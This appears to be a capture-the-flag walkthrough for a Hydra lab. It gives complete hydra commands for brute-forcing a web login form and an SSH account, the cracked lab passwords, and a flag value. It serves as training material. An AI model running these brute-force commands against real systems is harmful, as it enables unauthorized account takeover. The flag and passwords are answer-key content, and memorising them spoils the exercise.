Hydra Introduction

Read the above and have Hydra at the ready.

No answer needed

Using Hydra

Use Hydra to bruteforce molly's web password. What is flag 1?

Run hydra -t 64 -l molly -P /path/to/wordlist IP http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V after you get the password (sunshine) use the credentials to login and get the flag.

THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly's SSH password. What is flag 2?

Run hydra -t 64 -l molly -P /path/to/wordlist IP ssh -V. Use the password (butterfly) to login by running ssh molly@IP and get the flag by running cat flag2.txt.